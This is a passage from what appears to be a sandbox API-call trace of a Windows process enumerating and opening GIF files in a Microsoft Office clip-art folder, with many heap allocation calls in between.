lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.230] AreFileApisANSI () returned 1 [0102.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0102.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 69 [0102.230] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34cb)) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0102.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.230] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4edd, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD10972_.GIF", cAlternateFileName="")) returned 1 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0102.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0102.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0102.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0102.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0102.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.231] AreFileApisANSI () returned 1 [0102.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF", lpUsedDefaultChar=0x0) returned 69 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0102.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.231] AreFileApisANSI () returned 1 [0102.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0102.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 69 [0102.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.232] GetFileType (hFile=0x33c) returned 0x1 [0102.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0102.232] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.232] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.232] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.232] CloseHandle (hObject=0x33c) returned 1 [0102.232] AreFileApisANSI () returned 1 [0102.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 69 [0102.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.233] GetFileType (hFile=0x33c) returned 0x1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.233] CloseHandle (hObject=0x33c) returned 1 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.234] AreFileApisANSI () returned 1 [0102.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 69 [0102.234] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4edd)) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0102.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.234] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fe6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD19563_.GIF", cAlternateFileName="")) returned 1 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0102.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.235] AreFileApisANSI () returned 1 [0102.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF", lpUsedDefaultChar=0x0) returned 69 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0102.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.236] AreFileApisANSI () returned 1 [0102.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0102.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 69 [0102.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.236] GetFileType (hFile=0x33c) returned 0x1 [0102.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.236] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.236] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.237] SetFilePointerEx (in: 